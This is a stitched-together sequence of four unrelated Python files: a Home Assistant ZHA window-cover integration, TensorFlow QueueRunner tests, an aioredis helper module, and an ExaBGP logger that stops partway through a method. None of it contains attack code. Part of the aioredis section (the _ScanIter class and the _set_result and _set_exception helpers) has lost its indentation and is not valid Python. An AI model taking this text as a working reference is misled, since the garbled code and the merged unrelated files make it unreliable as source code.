    # Defer entity creation until discovery signals that entities are ready.
    add_discovered = functools.partial(
        discovery.async_add_entities, async_add_entities, entities_to_create
    )
    unsub = async_dispatcher_connect(hass, SIGNAL_ADD_ENTITIES, add_discovered)
    # Disconnect the dispatcher listener when the config entry unloads.
    config_entry.async_on_unload(unsub)
@MULTI_MATCH(channel_names=CHANNEL_COVER)
class ZhaCover(ZhaEntity, CoverEntity):
    """Representation of a ZHA cover."""
    def __init__(self, unique_id, zha_device, channels, **kwargs):
        """Init this sensor."""
        super().__init__(unique_id, zha_device, channels, **kwargs)
        # Window-covering cluster channel; position updates arrive via it.
        self._cover_channel = self.cluster_channels.get(CHANNEL_COVER)
        # HA-convention position: None unknown, 0 closed, 100 fully open.
        self._current_position = None
    async def async_added_to_hass(self):
        """Run when about to be added to hass."""
        await super().async_added_to_hass()
        # Track device-initiated moves via attribute update signals.
        self.async_accept_signal(
            self._cover_channel, SIGNAL_ATTR_UPDATED, self.async_set_position
        )
    @callback
    def async_restore_last_state(self, last_state):
        """Restore previous state."""
        self._state = last_state.state
        if "current_position" in last_state.attributes:
            self._current_position = last_state.attributes["current_position"]
    @property
    def is_closed(self):
        """Return if the cover is closed."""
        # Tri-state: None while the position is still unknown.
        if self.current_cover_position is None:
            return None
        return self.current_cover_position == 0
    @property
    def is_opening(self):
        """Return if the cover is opening or not."""
        return self._state == STATE_OPENING
    @property
    def is_closing(self):
        """Return if the cover is closing or not."""
        return self._state == STATE_CLOSING
    @property
    def current_cover_position(self):
        """Return the current position of ZHA cover.
        None is unknown, 0 is closed, 100 is fully open.
        """
        return self._current_position
    @callback
    def async_set_position(self, attr_id, attr_name, value):
        """Handle position update from channel."""
        _LOGGER.debug("setting position: %s", value)
        # The channel reports lift percentage with the opposite sense of
        # the HA convention (here 0 closed / 100 open), so invert.
        self._current_position = 100 - value
        if self._current_position == 0:
            self._state = STATE_CLOSED
        elif self._current_position == 100:
            self._state = STATE_OPEN
        self.async_write_ha_state()
    @callback
    def async_update_state(self, state):
        """Handle state update from channel."""
        _LOGGER.debug("state=%s", state)
        self._state = state
        self.async_write_ha_state()
    async def async_open_cover(self, **kwargs):
        """Open the window cover."""
        res = await self._cover_channel.up_open()
        # Successful replies come back as a list with the status second.
        if isinstance(res, list) and res[1] is Status.SUCCESS:
            self.async_update_state(STATE_OPENING)
    async def async_close_cover(self, **kwargs):
        """Close the window cover."""
        res = await self._cover_channel.down_close()
        if isinstance(res, list) and res[1] is Status.SUCCESS:
            self.async_update_state(STATE_CLOSING)
    async def async_set_cover_position(self, **kwargs):
        """Move the roller shutter to a specific position."""
        new_pos = kwargs[ATTR_POSITION]
        # Invert back to the channel's lift-percentage convention.
        res = await self._cover_channel.go_to_lift_percentage(100 - new_pos)
        if isinstance(res, list) and res[1] is Status.SUCCESS:
            # NOTE(review): assumes _current_position is not None here --
            # confirm a position update always precedes this call.
            self.async_update_state(
                STATE_CLOSING if new_pos < self._current_position else STATE_OPENING
            )
    async def async_stop_cover(self, **kwargs):
        """Stop the window cover."""
        res = await self._cover_channel.stop()
        if isinstance(res, list) and res[1] is Status.SUCCESS:
            # Mid-travel stop: any position above 0 counts as open.
            self._state = STATE_OPEN if self._current_position > 0 else STATE_CLOSED
            self.async_write_ha_state()
    async def async_update(self):
        """Attempt to retrieve the open/close state of the cover."""
        await super().async_update()
        await self.async_get_state()
    async def async_get_state(self, from_cache=True):
        """Fetch the current state."""
        _LOGGER.debug("polling current state")
        if self._cover_channel:
            pos = await self._cover_channel.get_attribute_value(
                "current_position_lift_percentage", from_cache=from_cache
            )
            _LOGGER.debug("read pos=%s", pos)
            if pos is not None:
                # Same inversion as async_set_position.
                self._current_position = 100 - pos
                self._state = (
                    STATE_OPEN if self.current_cover_position > 0 else STATE_CLOSED
                )
            else:
                self._current_position = None
                self._state = None
@MULTI_MATCH(channel_names={CHANNEL_LEVEL, CHANNEL_ON_OFF, CHANNEL_SHADE})
class Shade(ZhaEntity, CoverEntity):
    """ZHA Shade.

    Driven by two channels: on/off for fully open/closed commands and
    level for positioning (level 0-255 mapped to position 0-100).
    """

    _attr_device_class = CoverDeviceClass.SHADE

    def __init__(
        self,
        unique_id: str,
        zha_device: ZhaDeviceType,
        channels: list[ChannelType],
        **kwargs,
    ) -> None:
        """Initialize the ZHA shade."""
        super().__init__(unique_id, zha_device, channels, **kwargs)
        self._on_off_channel = self.cluster_channels[CHANNEL_ON_OFF]
        self._level_channel = self.cluster_channels[CHANNEL_LEVEL]
        # Position 0-100 (HA convention) or None while unknown.
        self._position = None
        self._is_open = None

    @property
    def current_cover_position(self):
        """Return current position of cover.
        None is unknown, 0 is closed, 100 is fully open.
        """
        return self._position

    @property
    def is_closed(self) -> bool | None:
        """Return True if shade is closed."""
        if self._is_open is None:
            return None
        return not self._is_open

    async def async_added_to_hass(self):
        """Run when about to be added to hass."""
        await super().async_added_to_hass()
        # On/off reports open/closed; level reports the position.
        self.async_accept_signal(
            self._on_off_channel, SIGNAL_ATTR_UPDATED, self.async_set_open_closed
        )
        self.async_accept_signal(
            self._level_channel, SIGNAL_SET_LEVEL, self.async_set_level
        )

    @callback
    def async_restore_last_state(self, last_state):
        """Restore previous state."""
        self._is_open = last_state.state == STATE_OPEN
        if ATTR_CURRENT_POSITION in last_state.attributes:
            self._position = last_state.attributes[ATTR_CURRENT_POSITION]

    @callback
    def async_set_open_closed(self, attr_id: int, attr_name: str, value: bool) -> None:
        """Set open/closed state."""
        self._is_open = bool(value)
        self.async_write_ha_state()

    @callback
    def async_set_level(self, value: int) -> None:
        """Set the reported position."""
        # Clamp to the valid ZCL level range, then scale 0-255 -> 0-100.
        value = max(0, min(255, value))
        self._position = int(value * 100 / 255)
        self.async_write_ha_state()

    async def async_open_cover(self, **kwargs):
        """Open the window cover."""
        res = await self._on_off_channel.on()
        if not isinstance(res, list) or res[1] != Status.SUCCESS:
            self.debug("couldn't open cover: %s", res)
            return
        self._is_open = True
        self.async_write_ha_state()

    async def async_close_cover(self, **kwargs):
        """Close the window cover."""
        res = await self._on_off_channel.off()
        if not isinstance(res, list) or res[1] != Status.SUCCESS:
            # Fix: the failure message previously said "open".
            self.debug("couldn't close cover: %s", res)
            return
        self._is_open = False
        self.async_write_ha_state()

    async def async_set_cover_position(self, **kwargs):
        """Move the roller shutter to a specific position."""
        new_pos = kwargs[ATTR_POSITION]
        # Scale HA's 0-100 back to the 0-255 level range.
        res = await self._level_channel.move_to_level_with_on_off(
            new_pos * 255 / 100, 1
        )
        if not isinstance(res, list) or res[1] != Status.SUCCESS:
            self.debug("couldn't set cover's position: %s", res)
            return
        self._position = new_pos
        self.async_write_ha_state()

    async def async_stop_cover(self, **kwargs) -> None:
        """Stop the cover."""
        res = await self._level_channel.stop()
        if not isinstance(res, list) or res[1] != Status.SUCCESS:
            self.debug("couldn't stop cover: %s", res)
            return
@MULTI_MATCH(
    channel_names={CHANNEL_LEVEL, CHANNEL_ON_OFF}, manufacturers="Keen Home Inc"
)
class KeenVent(Shade):
    """Keen vent cover."""

    _attr_device_class = CoverDeviceClass.DAMPER

    async def async_open_cover(self, **kwargs):
        """Open the cover."""
        # Reopen to the last known position, defaulting to fully open.
        target = self._position or 100
        results = await asyncio.gather(
            self._level_channel.move_to_level_with_on_off(target * 255 / 100, 1),
            self._on_off_channel.on(),
            return_exceptions=True,
        )
        if any(isinstance(outcome, Exception) for outcome in results):
            self.debug("couldn't open cover")
            return
        self._is_open = True
        self._position = target
        self.async_write_ha_state()
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for QueueRunner."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import tensorflow as tf
class QueueRunnerTest(tf.test.TestCase):
  """Unit tests for tf.train.QueueRunner thread management and error capture."""

  def testBasic(self):
    """A single enqueue op runs until OutOfRange; no exceptions recorded."""
    with self.test_session() as sess:
      # CountUpTo will raise OUT_OF_RANGE when it reaches the count.
      zero64 = tf.constant(0, dtype=tf.int64)
      var = tf.Variable(zero64)
      count_up_to = var.count_up_to(3)
      queue = tf.FIFOQueue(10, tf.float32)
      tf.global_variables_initializer().run()
      qr = tf.train.QueueRunner(queue, [count_up_to])
      threads = qr.create_threads(sess)
      for t in threads:
        t.start()
      for t in threads:
        t.join()
      self.assertEqual(0, len(qr.exceptions_raised))
      # The variable should be 3.
      self.assertEqual(3, var.eval())

  def testTwoOps(self):
    """Two enqueue ops run in parallel threads, each to its own limit."""
    with self.test_session() as sess:
      # CountUpTo will raise OUT_OF_RANGE when it reaches the count.
      zero64 = tf.constant(0, dtype=tf.int64)
      var0 = tf.Variable(zero64)
      count_up_to_3 = var0.count_up_to(3)
      var1 = tf.Variable(zero64)
      count_up_to_30 = var1.count_up_to(30)
      queue = tf.FIFOQueue(10, tf.float32)
      qr = tf.train.QueueRunner(queue, [count_up_to_3, count_up_to_30])
      threads = qr.create_threads(sess)
      tf.global_variables_initializer().run()
      for t in threads:
        t.start()
      for t in threads:
        t.join()
      self.assertEqual(0, len(qr.exceptions_raised))
      self.assertEqual(3, var0.eval())
      self.assertEqual(30, var1.eval())

  def testExceptionsCaptured(self):
    """Invalid ops raise in the runner threads and are stored, not re-raised."""
    with self.test_session() as sess:
      queue = tf.FIFOQueue(10, tf.float32)
      qr = tf.train.QueueRunner(queue, ["i fail", "so fail"])
      threads = qr.create_threads(sess)
      tf.global_variables_initializer().run()
      for t in threads:
        t.start()
      for t in threads:
        t.join()
      exceptions = qr.exceptions_raised
      self.assertEqual(2, len(exceptions))
      self.assertTrue("Operation not in the graph" in str(exceptions[0]))
      self.assertTrue("Operation not in the graph" in str(exceptions[1]))

  def testRealDequeueEnqueue(self):
    """Runner moves values between two real queues and closes cleanly."""
    with self.test_session() as sess:
      q0 = tf.FIFOQueue(3, tf.float32)
      enqueue0 = q0.enqueue((10.0,))
      close0 = q0.close()
      q1 = tf.FIFOQueue(30, tf.float32)
      enqueue1 = q1.enqueue((q0.dequeue(),))
      dequeue1 = q1.dequeue()
      qr = tf.train.QueueRunner(q1, [enqueue1])
      threads = qr.create_threads(sess)
      for t in threads:
        t.start()
      # Enqueue 2 values, then close queue0.
      enqueue0.run()
      enqueue0.run()
      close0.run()
      # Wait for the queue runner to terminate.
      for t in threads:
        t.join()
      # It should have terminated cleanly.
      self.assertEqual(0, len(qr.exceptions_raised))
      # The 2 values should be in queue1.
      self.assertEqual(10.0, dequeue1.eval())
      self.assertEqual(10.0, dequeue1.eval())
      # And queue1 should now be closed.
      with self.assertRaisesRegexp(tf.errors.OutOfRangeError, "is closed"):
        dequeue1.eval()

  def testRespectCoordShouldStop(self):
    """Threads observe a coordinator that already requested a stop."""
    with self.test_session() as sess:
      # CountUpTo will raise OUT_OF_RANGE when it reaches the count.
      zero64 = tf.constant(0, dtype=tf.int64)
      var = tf.Variable(zero64)
      count_up_to = var.count_up_to(3)
      queue = tf.FIFOQueue(10, tf.float32)
      tf.global_variables_initializer().run()
      qr = tf.train.QueueRunner(queue, [count_up_to])
      # Ask the coordinator to stop. The queue runner should
      # finish immediately.
      coord = tf.train.Coordinator()
      coord.request_stop()
      threads = qr.create_threads(sess, coord)
      for t in threads:
        t.start()
      coord.join()
      self.assertEqual(0, len(qr.exceptions_raised))
      # The variable should be 0.
      self.assertEqual(0, var.eval())

  def testRequestStopOnException(self):
    """With a coordinator, runner exceptions propagate through coord.join."""
    with self.test_session() as sess:
      queue = tf.FIFOQueue(10, tf.float32)
      qr = tf.train.QueueRunner(queue, ["not an op"])
      coord = tf.train.Coordinator()
      threads = qr.create_threads(sess, coord)
      for t in threads:
        t.start()
      # The exception should be re-raised when joining.
      with self.assertRaisesRegexp(ValueError, "Operation not in the graph"):
        coord.join()

  def testGracePeriod(self):
    """request_stop closes the queue so a blocked enqueue can terminate."""
    with self.test_session() as sess:
      # The enqueue will quickly block.
      queue = tf.FIFOQueue(2, tf.float32)
      enqueue = queue.enqueue((10.0,))
      dequeue = queue.dequeue()
      qr = tf.train.QueueRunner(queue, [enqueue])
      coord = tf.train.Coordinator()
      qr.create_threads(sess, coord, start=True)
      # Dequeue one element and then request stop.
      dequeue.op.run()
      time.sleep(0.02)
      coord.request_stop()
      # We should be able to join because the RequestStop() will cause
      # the queue to be closed and the enqueue to terminate.
      coord.join(stop_grace_period_secs=0.05)

  def testMultipleSessions(self):
    """create_threads makes a distinct thread set for each session."""
    with self.test_session() as sess:
      with tf.Session() as other_sess:
        zero64 = tf.constant(0, dtype=tf.int64)
        var = tf.Variable(zero64)
        count_up_to = var.count_up_to(3)
        queue = tf.FIFOQueue(10, tf.float32)
        tf.global_variables_initializer().run()
        coord = tf.train.Coordinator()
        qr = tf.train.QueueRunner(queue, [count_up_to])
        # NOTE that this test does not actually start the threads.
        threads = qr.create_threads(sess, coord=coord)
        other_threads = qr.create_threads(other_sess, coord=coord)
        self.assertEqual(len(threads), len(other_threads))

  def testIgnoreMultiStarts(self):
    """A second create_threads call for the same session returns no threads."""
    with self.test_session() as sess:
      # CountUpTo will raise OUT_OF_RANGE when it reaches the count.
      zero64 = tf.constant(0, dtype=tf.int64)
      var = tf.Variable(zero64)
      count_up_to = var.count_up_to(3)
      queue = tf.FIFOQueue(10, tf.float32)
      tf.global_variables_initializer().run()
      coord = tf.train.Coordinator()
      qr = tf.train.QueueRunner(queue, [count_up_to])
      threads = []
      # NOTE that this test does not actually start the threads.
      threads.extend(qr.create_threads(sess, coord=coord))
      new_threads = qr.create_threads(sess, coord=coord)
      self.assertEqual([], new_threads)

  def testThreads(self):
    """Runner threads can be created and joined repeatedly; errors reset."""
    with self.test_session() as sess:
      # CountUpTo will raise OUT_OF_RANGE when it reaches the count.
      zero64 = tf.constant(0, dtype=tf.int64)
      var = tf.Variable(zero64)
      count_up_to = var.count_up_to(3)
      queue = tf.FIFOQueue(10, tf.float32)
      tf.global_variables_initializer().run()
      qr = tf.train.QueueRunner(queue, [count_up_to, "bad op"])
      threads = qr.create_threads(sess, start=True)
      for t in threads:
        t.join()
      exceptions = qr.exceptions_raised
      self.assertEqual(1, len(exceptions))
      self.assertTrue("Operation not in the graph" in str(exceptions[0]))
      threads = qr.create_threads(sess, start=True)
      for t in threads:
        t.join()
      exceptions = qr.exceptions_raised
      self.assertEqual(1, len(exceptions))
      self.assertTrue("Operation not in the graph" in str(exceptions[0]))

  def testName(self):
    """The runner is named after its queue and registered per scope."""
    with tf.name_scope("scope"):
      queue = tf.FIFOQueue(10, tf.float32, name="queue")
      qr = tf.train.QueueRunner(queue, [tf.no_op()])
    self.assertEqual("scope/queue", qr.name)
    tf.train.add_queue_runner(qr)
    self.assertEqual(1, len(tf.get_collection(tf.GraphKeys.QUEUE_RUNNERS,
                                              "scope")))

  def testStartQueueRunners(self):
    """start_queue_runners launches runners from the default collection."""
    # CountUpTo will raise OUT_OF_RANGE when it reaches the count.
    zero64 = tf.constant(0, dtype=tf.int64)
    var = tf.Variable(zero64)
    count_up_to = var.count_up_to(3)
    queue = tf.FIFOQueue(10, tf.float32)
    init_op = tf.global_variables_initializer()
    qr = tf.train.QueueRunner(queue, [count_up_to])
    tf.train.add_queue_runner(qr)
    with self.test_session() as sess:
      init_op.run()
      threads = tf.train.start_queue_runners(sess)
      for t in threads:
        t.join()
      self.assertEqual(0, len(qr.exceptions_raised))
      # The variable should be 3.
      self.assertEqual(3, var.eval())

  def testStartQueueRunnersNonDefaultGraph(self):
    """start_queue_runners works with an explicitly constructed graph."""
    # CountUpTo will raise OUT_OF_RANGE when it reaches the count.
    graph = tf.Graph()
    with graph.as_default():
      zero64 = tf.constant(0, dtype=tf.int64)
      var = tf.Variable(zero64)
      count_up_to = var.count_up_to(3)
      queue = tf.FIFOQueue(10, tf.float32)
      init_op = tf.global_variables_initializer()
      qr = tf.train.QueueRunner(queue, [count_up_to])
      tf.train.add_queue_runner(qr)
    with self.test_session(graph=graph) as sess:
      init_op.run()
      threads = tf.train.start_queue_runners(sess)
      for t in threads:
        t.join()
      self.assertEqual(0, len(qr.exceptions_raised))
      # The variable should be 3.
      self.assertEqual(3, var.eval())

  def testQueueRunnerSerializationRoundTrip(self):
    """to_proto/from_proto round-trips all fields, with a legacy fallback."""
    graph = tf.Graph()
    with graph.as_default():
      queue = tf.FIFOQueue(10, tf.float32, name="queue")
      enqueue_op = tf.no_op(name="enqueue")
      close_op = tf.no_op(name="close")
      cancel_op = tf.no_op(name="cancel")
      qr0 = tf.train.QueueRunner(
          queue, [enqueue_op], close_op, cancel_op,
          queue_closed_exception_types=(
              tf.errors.OutOfRangeError, tf.errors.CancelledError))
      qr0_proto = tf.train.QueueRunner.to_proto(qr0)
      qr0_recon = tf.train.QueueRunner.from_proto(qr0_proto)
      self.assertEqual("queue", qr0_recon.queue.name)
      self.assertEqual(1, len(qr0_recon.enqueue_ops))
      self.assertEqual(enqueue_op, qr0_recon.enqueue_ops[0])
      self.assertEqual(close_op, qr0_recon.close_op)
      self.assertEqual(cancel_op, qr0_recon.cancel_op)
      self.assertEqual(
          (tf.errors.OutOfRangeError, tf.errors.CancelledError),
          qr0_recon.queue_closed_exception_types)
      # Assert we reconstruct an OutOfRangeError for QueueRunners
      # created before QueueRunnerDef had a queue_closed_exception_types field.
      del qr0_proto.queue_closed_exception_types[:]
      qr0_legacy_recon = tf.train.QueueRunner.from_proto(qr0_proto)
      self.assertEqual("queue", qr0_legacy_recon.queue.name)
      self.assertEqual(1, len(qr0_legacy_recon.enqueue_ops))
      self.assertEqual(enqueue_op, qr0_legacy_recon.enqueue_ops[0])
      self.assertEqual(close_op, qr0_legacy_recon.close_op)
      self.assertEqual(cancel_op, qr0_legacy_recon.cancel_op)
      self.assertEqual(
          (tf.errors.OutOfRangeError,),
          qr0_legacy_recon.queue_closed_exception_types)
# Run the test suite when this module is executed directly.
if __name__ == "__main__":
  tf.test.main()
|
|
from urllib.parse import urlparse, parse_qsl
from .log import logger
# Sentinel to distinguish "argument not provided" from an explicit None.
_NOTSET = object()

# NOTE: never put here anything else;
# just this basic types
# Maps each supported argument type to a callable producing its wire
# representation (bytes) for the redis protocol.
_converters = {
    bytes: lambda val: val,
    bytearray: lambda val: val,
    str: lambda val: val.encode(),
    int: lambda val: b'%d' % val,
    float: lambda val: b'%r' % val,
}


def encode_command(*args):
    """Encodes arguments into redis bulk-strings array.

    Raises TypeError if any of args not of bytearray, bytes, float, int, or str
    type.
    """
    # RESP array header: *<number of elements>\r\n
    buf = bytearray(b'*%d\r\n' % len(args))
    try:
        for arg in args:
            barg = _converters[type(arg)](arg)
            # RESP bulk string: $<byte length>\r\n<payload>\r\n
            buf.extend(b'$%d\r\n%s\r\n' % (len(barg), barg))
    except KeyError as exc:
        # BUGFIX: chain the original KeyError explicitly (the bound `exc`
        # was previously captured but never used).
        raise TypeError("Argument {!r} expected to be of bytearray, bytes,"
                        " float, int, or str type".format(arg)) from exc
    return buf
def decode(obj, encoding):
    """Recursively decode a redis reply: bytes to str, lists element-wise."""
    if isinstance(obj, list):
        return [decode(item, encoding) for item in obj]
    if isinstance(obj, bytes):
        return obj.decode(encoding)
    return obj
async def wait_ok(fut):
    """Await *fut*; pass QUEUED through unchanged, else return reply == OK."""
    reply = await fut
    if reply == b'QUEUED' or reply == 'QUEUED':
        return reply
    return reply == b'OK' or reply == 'OK'
async def wait_convert(fut, type_, **kwargs):
    """Await *fut* and coerce the reply with *type_* (QUEUED passes through)."""
    reply = await fut
    if reply == b'QUEUED' or reply == 'QUEUED':
        return reply
    return type_(reply, **kwargs)
async def wait_make_dict(fut):
    """Await *fut* (a flat key/value reply list) and pair it into a dict."""
    reply = await fut
    if reply == b'QUEUED' or reply == 'QUEUED':
        return reply
    pairs = iter(reply)
    return dict(zip(pairs, pairs))
class coerced_keys_dict(dict):
    """dict whose lookups coerce non-bytes keys to bytes via _converters."""

    def __getitem__(self, key):
        if not isinstance(key, bytes):
            key = _converters[type(key)](key)
        return super().__getitem__(key)

    def __contains__(self, key):
        if not isinstance(key, bytes):
            key = _converters[type(key)](key)
        return super().__contains__(key)
class _ScanIter:
__slots__ = ('_scan', '_cur', '_ret')
def __init__(self, scan):
self._scan = scan
self._cur = b'0'
self._ret = []
def __aiter__(self):
return self
async def __anext__(self):
while not self._ret and self._cur:
self._cur, self._ret = await self._scan(self._cur)
if not self._cur and not self._ret:
raise StopAsyncIteration # noqa
else:
ret = self._ret.pop(0)
return ret
def _set_result(fut, result, *info):
if fut.done():
logger.debug("Waiter future is already done %r %r", fut, info)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, result, info)
else:
fut.set_result(result)
def _set_exception(fut, exception):
if fut.done():
logger.debug("Waiter future is already done %r", fut)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, exception)
else:
fut.set_exception(exception)
def parse_url(url):
    """Parse Redis connection URI.

    Parse according to IANA specs:
    * https://www.iana.org/assignments/uri-schemes/prov/redis
    * https://www.iana.org/assignments/uri-schemes/prov/rediss

    Also more rules applied:

    * empty scheme is treated as unix socket path no further parsing is done.
    * 'unix://' scheme is treated as unix socket path and parsed.
    * Multiple query parameter values and blank values are considered error.
    * DB number specified as path and as query parameter is considered error.
    * Password specified in userinfo and as query parameter is
      considered error.
    """
    parsed = urlparse(url)
    assert parsed.scheme in ('', 'redis', 'rediss', 'unix'), (
        "Unsupported URI scheme", parsed.scheme)
    if parsed.scheme == '':
        # Bare path: the whole string is a unix socket path, no options.
        return url, {}

    query = {}
    for name, value in parse_qsl(parsed.query, keep_blank_values=True):
        assert name not in query, ("Multiple parameters are not allowed", name, value)
        assert value, ("Empty parameters are not allowed", name, value)
        query[name] = value

    if parsed.scheme == 'unix':
        assert parsed.path, ("Empty path is not allowed", url)
        assert not parsed.netloc, (
            "Netlocation is not allowed for unix scheme", parsed.netloc)
        return parsed.path, _parse_uri_options(query, '', parsed.password)

    address = (parsed.hostname or 'localhost', int(parsed.port or 6379))
    path = parsed.path
    if path.startswith('/'):
        # Drop exactly one leading slash; the remainder is the DB number.
        path = path[1:]
    options = _parse_uri_options(query, path, parsed.password)
    if parsed.scheme == 'rediss':
        options['ssl'] = True
    return address, options


def _parse_uri_options(params, path, password):
    """Build the connection options dict from query params, path and userinfo."""

    def parse_db_num(val):
        if not val:
            return None
        assert val.isdecimal(), ("Invalid decimal integer", val)
        assert val == '0' or not val.startswith('0'), (
            "Expected integer without leading zeroes", val)
        return int(val)

    options = {}

    db_from_path = parse_db_num(path)
    db_from_query = parse_db_num(params.get('db'))
    assert db_from_path is None or db_from_query is None, (
        "Single DB value expected, got path and query",
        db_from_path, db_from_query)
    if db_from_path is not None:
        options['db'] = db_from_path
    elif db_from_query is not None:
        options['db'] = db_from_query

    pw_from_query = params.get('password')
    assert not password or not pw_from_query, (
        "Single password value is expected, got in net location and query")
    if password:
        options['password'] = password
    elif pw_from_query:
        options['password'] = pw_from_query

    if 'encoding' in params:
        options['encoding'] = params['encoding']
    if 'ssl' in params:
        assert params['ssl'] in ('true', 'false'), (
            "Expected 'ssl' param to be 'true' or 'false' only",
            params['ssl'])
        options['ssl'] = params['ssl'] == 'true'
    if 'timeout' in params:
        options['timeout'] = float(params['timeout'])
    return options
def encode_str(obj):
    """Convert *obj* to bytes if its type has a registered converter."""
    converter = _converters.get(type(obj))
    if converter is None:
        return obj
    return converter(obj)
class cached_property:
    """Non-data descriptor that caches the wrapped method's result per instance.

    The first attribute access computes the value and stores it in the
    instance ``__dict__`` under the function's name; because this descriptor
    defines no ``__set__``, later lookups hit the instance attribute directly
    and never re-enter the descriptor.
    """

    def __init__(self, func):
        self.func = func

    def __get__(self, instance, cls=None):
        if instance is None:
            # BUGFIX: class-level access (e.g. introspection of C.attr)
            # previously crashed on None.__dict__; return the descriptor,
            # matching functools.cached_property behavior.
            return self
        name = self.func.__name__
        result = instance.__dict__[name] = self.func(instance)
        return result
|
|
# encoding: utf-8
"""
utils.py
Created by Thomas Mangin on 2009-09-06.
Copyright (c) 2009-2015 Exa Networks. All rights reserved.
"""
import os
import sys
import stat
import time
import syslog
import logging
import logging.handlers
from exabgp.configuration.environment import environment
# Abbreviations mapping python logging level names to syslog-style names.
_short = {
    'CRITICAL': 'CRIT',
    'ERROR': 'ERR',
}


def short (name):
    """Return the short (syslog-style) form of a level name."""
    upper = name.upper()
    return _short.get(upper, upper)
class LazyFormat (object):
    """Defer message formatting until the string is actually rendered."""

    def __init__ (self, prefix, format, message):
        self.prefix = prefix
        self.format = format
        self.message = message

    def __str__ (self):
        # Apply the formatter lazily, only when the record is emitted.
        if not self.format:
            return self.prefix + self.message
        return self.prefix + self.format(self.message)

    def split (self, c):
        return str(self).split(c)
class _Logger (object):
	"""Process-wide logger dispatching ExaBGP messages to syslog/stream/file handlers.

	Python 2 module: uses print statements when no handler is configured.
	Per-category recorders (network, wire, rib, ...) emit only when their
	category is enabled and the level passes; otherwise they buffer the
	record into a small in-memory history.
	"""
	_instance = None
	_syslog = None
	# ring buffer of the last _max_history records, rendered by history()
	_history = []
	_max_history = 20
	_config = ''
	_pid = os.getpid()
	_cwd = os.getcwd()
	# we use os.pid everytime as we may fork and the class is instance before it
	def pdb (self,level):
		# drop into the debugger on critical records when --pdb was requested
		if self._pdb and level in ['CRITICAL','critical']:
			import pdb
			pdb.set_trace()
	def config (self,config=None):
		# getter/setter for the cached configuration text
		if config is not None:
			self._config = config
		return self._config
	def history (self):
		return "\n".join(self._format(*_) for _ in self._history)
	def _record (self,timestamp,level,source,message):
		# append to the bounded history buffer, evicting the oldest entry
		if len(self._history) > self._max_history:
			self._history.pop(0)
		self._history.append((timestamp,level,source,message))
	def _format (self,timestamp,level,source,message):
		if self.short: return message
		now = time.strftime('%a, %d %b %Y %H:%M:%S',timestamp)
		return "%s | %-8s | %-6d | %-13s | %s" % (now,level,self._pid,source,message)
	def _prefixed (self,level,source,message):
		ts = time.localtime()
		self._record(ts,level,source,message)
		return self._format(ts,level,source,message)
	def __init__ (self):
		# category enable flags all come from the environment configuration
		command = environment.settings()
		self.short = command.log.short
		self.level = command.log.level
		self._pdb = command.debug.pdb
		self._reactor = command.log.enable and (command.log.all or command.log.reactor)
		self._daemon = command.log.enable and (command.log.all or command.log.daemon)
		self._processes = command.log.enable and (command.log.all or command.log.processes)
		self._configuration = command.log.enable and (command.log.all or command.log.configuration)
		self._network = command.log.enable and (command.log.all or command.log.network)
		self._wire = command.log.enable and (command.log.all or command.log.packets)
		self._message = command.log.enable and (command.log.all or command.log.message)
		self._rib = command.log.enable and (command.log.all or command.log.rib)
		self._timer = command.log.enable and (command.log.all or command.log.timers)
		self._routes = command.log.enable and (command.log.all or command.log.routes)
		self._parser = command.log.enable and (command.log.all or command.log.parser)
		if not command.log.enable:
			return
		self.destination = command.log.destination
		self.restart(True)
	def _can_write (self,location):
		# returns True/False for write permission, None if the directory is missing
		try:
			s = os.stat(os.path.dirname(location))
		except OSError:
			return None
		mode = s[stat.ST_MODE]
		uid = os.geteuid()
		gid = os.getegid()
		return not not (
			((s[stat.ST_UID] == uid) and (mode & stat.S_IWUSR)) or
			((s[stat.ST_GID] == gid) and (mode & stat.S_IWGRP)) or
			(mode & stat.S_IWOTH)
		)
	def restart (self,first=False):
		"""(Re)install the logging handler for the configured destination.

		Destinations: ''/'syslog', 'host:<name>', 'stdout', 'stderr',
		or a file path (rotating file handler). Returns True on success.
		"""
		if first:
			destination = 'stderr'
		else:
			# drop previously installed handlers before re-configuring
			if self._syslog:
				for handler in self._syslog.handlers:
					self._syslog.removeHandler(handler)
			destination = self.destination
		try:
			if destination in ('','syslog'):
				if sys.platform == "darwin":
					address = '/var/run/syslog'
				else:
					address = '/dev/log'
				if not os.path.exists(address):
					# no local syslog socket: fall back to UDP syslog
					address = ('localhost', 514)
				handler = logging.handlers.SysLogHandler(address)
				self._syslog = logging.getLogger()
				self._syslog.setLevel(logging.DEBUG)
				self._syslog.addHandler(handler)
				return True
			if destination.lower().startswith('host:'):
				# If the address is invalid, each syslog call will print an error.
				# See how it can be avoided, as the socket error is encapsulated and not returned
				address = (destination[5:].strip(), 514)
				handler = logging.handlers.SysLogHandler(address)
				self._syslog = logging.getLogger()
				self._syslog.setLevel(logging.DEBUG)
				self._syslog.addHandler(handler)
				return True
			if destination.lower() == 'stdout':
				handler = logging.StreamHandler(sys.stdout)
				self._syslog = logging.getLogger()
				self._syslog.setLevel(logging.DEBUG)
				self._syslog.addHandler(handler)
				return True
			if destination.lower() == 'stderr':
				handler = logging.StreamHandler(sys.stderr)
				self._syslog = logging.getLogger()
				self._syslog.setLevel(logging.DEBUG)
				self._syslog.addHandler(handler)
				return True
			# folder
			logfile = os.path.realpath(os.path.normpath(os.path.join(self._cwd,destination)))
			can = self._can_write(logfile)
			if can is True:
				handler = logging.handlers.RotatingFileHandler(logfile, maxBytes=5*1024*1024, backupCount=5)
			elif can is None:
				self.critical('ExaBGP can not access (perhaps as it does not exist) the log folder provided','logger')
				return False
			else:
				self.critical('ExaBGP does not have the right to write in the requested log directory','logger')
				return False
			self._syslog = logging.getLogger()
			self._syslog.setLevel(logging.DEBUG)
			self._syslog.addHandler(handler)
			return True
		except IOError:
			self.critical('Can not set logging (are stdout/stderr closed?)','logger')
			return False
	# level emitters: route through the installed handler, or fall back
	# to stdout (Python 2 print statement) when none is configured yet
	def debug (self,message,source='',level='DEBUG'):
		for line in message.split('\n'):
			if self._syslog:
